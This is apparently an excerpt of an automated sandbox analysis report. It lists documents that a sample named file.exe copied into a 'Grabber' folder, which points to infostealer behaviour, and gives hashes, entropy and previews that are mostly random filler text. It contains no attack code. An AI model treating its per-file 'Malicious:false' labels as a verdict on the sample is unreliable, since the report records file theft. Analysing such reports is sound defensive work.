                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\HQJBRDYKDE.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\HQJBRDYKDE\FAAGWHBVUU.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696563923881884
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:5/VaDtnzLQ+f43tOT8I+KwurMekIRdXEt5L3tYor2Xp2CpvirtyrRofz/:hVaDQ3t9I+AFlXE7L3yLprvMEaD
                                                                                                                                                            MD5:CD90073A050D84BFC07DF7516A76BE8F
                                                                                                                                                            SHA1:5BA173F226A697FF62B1208D33B3BACA3B2EFC1D
                                                                                                                                                            SHA-256:8E77CEDA3994BC3AD371B51807B7B77A08F2F5A3A232C0991C4763C9B2E78E13
                                                                                                                                                            SHA-512:A07B25F8DB5B2E680122920BBDCFB6138ACD8856F203A447ED6E63E2411388567CC7ADB1C2DC2F9B87C7DCFD9671D1EAC8CB9FF9BB10677806755D739478C328
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:FAAGWHBVUUTPYVPHIDCKTSBBSJUWTPUSSQPMHQUEMEBFCRWOAGJBQFMXAGBRPPFMHYWZIVRYBYMLKSXBSVILBCREELIWCKXNLCFIWEZDKMNCFDFOVWLODVKQDZGKMNYKLEHRBLUSDVAZUPAREKTGWPSMEKUFMSLHXIKBIKFPKZTPIOVIWVCVEJBCECJMVZRWUFQKCHCDYMYSSNRYBTIYNJWBANTLSHUBWBRJPBZZNLFWUYJYBZIFPLPPSEZPOWEXVUHUJVJASMBCBQBMFYQHVFSDQVYOLOSARXZKXXONRBTMLGOTIENUWCOGJDANHCVTLBZKPLVIFICSYNNJDATITDCBHEATBFVVWLYLVGPXPBNVZHSPQOQVQNCQYBVJOQWIXIWBKDYYWBPNGFVJXXNBRMGKWWJYWGWBHIUEODZOQXRSLBZXJJPRVPCNTLVWWBLEVZTISPLUBADWNHYMMXYQUJWRECXAWEMKHIFYNPSWFNBKCKBCJAGWZVXGZAWQINZMAFPDGCTHXKXRDHWVKCCJQPZXLYTVPZLRVZELUVGBKPPWVPJNXPRLEEVEFJWIGEUIFCYFGOVZGYDSCDAQRMYJZQFYVLTANLMTLPXDPETVFGVJLPLKVCVPQFBHOXQRDYDIFYETSNYPWEVULVONZZBKSGIAZAMTXYMWISOFKQROAOZARHYXANJYXEXTERVKOFUSRDEHZCDOFBQMVCBXCHWUZOHSBRMBBAQNTBQIBXGWVMOGTTGSTIUIDNQZDCFUCSMZVEQTTRYGONMNKOUSVTNBMJXKCOXBLVQHFAAKIGBNDXZNYXNNSSESCPRHGMHBRSZZNJNGYXTMEQKCQQIYVDWDVXKEWBNJQQHOWQHHBAFFHTQLQQDBFVCGIUCNYMRAKDUTKSGMARKQACHUFYEGEUWZGJIPGBFYMIYONLAVYEOXUFICGTJCCRVOHBQQWRVQLRQIKKBTSDUERUZYUBPRBMCDSNKSKJAOCQNYWMDZDCEF

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\HQJBRDYKDE\GJBHWQDROJ.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694921863932654
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:IrXCbQfFinplOQLb3PE8zc+qQtqXyXp0KS5bvAcIFZD/:ITCbWiplOQHXzddmyC5LkN/
                                                                                                                                                            MD5:62949C1D490A67816174BD0CD1F9264D
                                                                                                                                                            SHA1:1F3D8262179A769CDCCECE24AAAC12384E1C3F26
                                                                                                                                                            SHA-256:DD2EED4F65D047B47F0BA09DF3A4CB1AEF399952780B8011D07C7F800CFDCC89
                                                                                                                                                            SHA-512:7E067C700CD325164E580CF6BF383042143332F6E2AE57D422A676C4D50E39712FF0BBE0DBC674BDDD89EBDA26068F076AD2999811F7A171CE77F95566186807
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GJBHWQDROJTTUSYIVSDOQIDPSJWMHPSLMXRIDWCWZNBCVLJGHNRTOFCIHNVPKSKWUWSERWJZGSUFAZTPJLUGPATEJEGCTIGWCTURHURXMOUKRCHIYAOWIWUWNKDBSKTIERRXTRYZTHTWVMTHGREIYRUGPXREMKMFRCCSZTFAKZNXFCAAULLWINOLUONZMAZSJPPRULAPILELOBZRVQKOPKDDFTRLIXEMHWSCSVLIZZXKNOZNZBAGJVHYBFATRUBEDSKAVYVSXHRDBAGYYRLMXVOWEVHNLKTHBIXHDHJVEEJCXTFXGQFGNEBKUPMFEWJGNBUBWWZZDHNTBWHLXQIQLSMFSNFFULYGZVJZMIINYLAVKHKJGRFMMFSCWJRMHAIRUCMWOSJGSZYRTETJTKRVZMRQTPGGCWVJQLUITHFHDZLCLQXAUWYRNETHGQEJCAZCLREUWRPKKEVARVYUEZJXCTUKDPOKTSLARNKLXEMFMSZXZBHQIPSSYOLUXVXNSRNTJKWKYDLHNAIREGBXNMXDZERNNOFVAEXDKZSDWXVXBHXLRTFKTHEHBWCKYBWJUSHHUDGURWSYNPQYWRSVYOLTMJLJWOQZHYSCIRNQUMSQLHBFHUQCPBTQLIOUMLSKXHTBDOAGAJCXUAAAOUZUQUDTZGIJWPQZPMPSLSQPAAHNFLWHYEVELFQFWXTMLOONNMANEDUFMOIXFUTHDDZOTKLVWUOGVMDULSQLPUPYEQDOHLXZEDRRMVKDEDNTGKNGOGCRKIPSIOEAFSSGSBZCCHZABVGPSSHTHLEAEFBAAMHOPUUTXVEGEHVKWVHABRMXGECIUCBQPOZPFHWOHRWVJVBOPBMVJWNCYFVCZIGVJIZMGHKWRVTJPZPQHZWZJEZYNHKJHGFWHCGOTLCECZSRWYLNBSBQKVGCMNZAVMUDQNJQSMHFLQSZEDWJDUOCKBPBKSNPZNGIOCHYOTBZLXOQZZCTWWKLLGKWFYIYXMWTBXLB

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\HQJBRDYKDE\GNLQNHOLWB.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.698695541849584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
                                                                                                                                                            MD5:64E7020B0B401F75D3061A1917D99E04
                                                                                                                                                            SHA1:785E09A2F76464E26CE282F41DE07D1B27FFB855
                                                                                                                                                            SHA-256:9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
                                                                                                                                                            SHA-512:14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\HQJBRDYKDE\HQJBRDYKDE.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\HQJBRDYKDE\NIRMEKAMZH.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\LHEPQPGEWF.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694579526837108
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                                                                                            MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                                                                                            SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                                                                                            SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                                                                                            SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\LHEPQPGEWF.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694579526837108
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                                                                                            MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                                                                                            SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                                                                                            SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                                                                                            SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):504
                                                                                                                                                            Entropy (8bit):3.5258560106596737
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
                                                                                                                                                            MD5:06E8F7E6DDD666DBD323F7D9210F91AE
                                                                                                                                                            SHA1:883AE527EE83ED9346CD82C33DFC0EB97298DC14
                                                                                                                                                            SHA-256:8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
                                                                                                                                                            SHA-512:F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

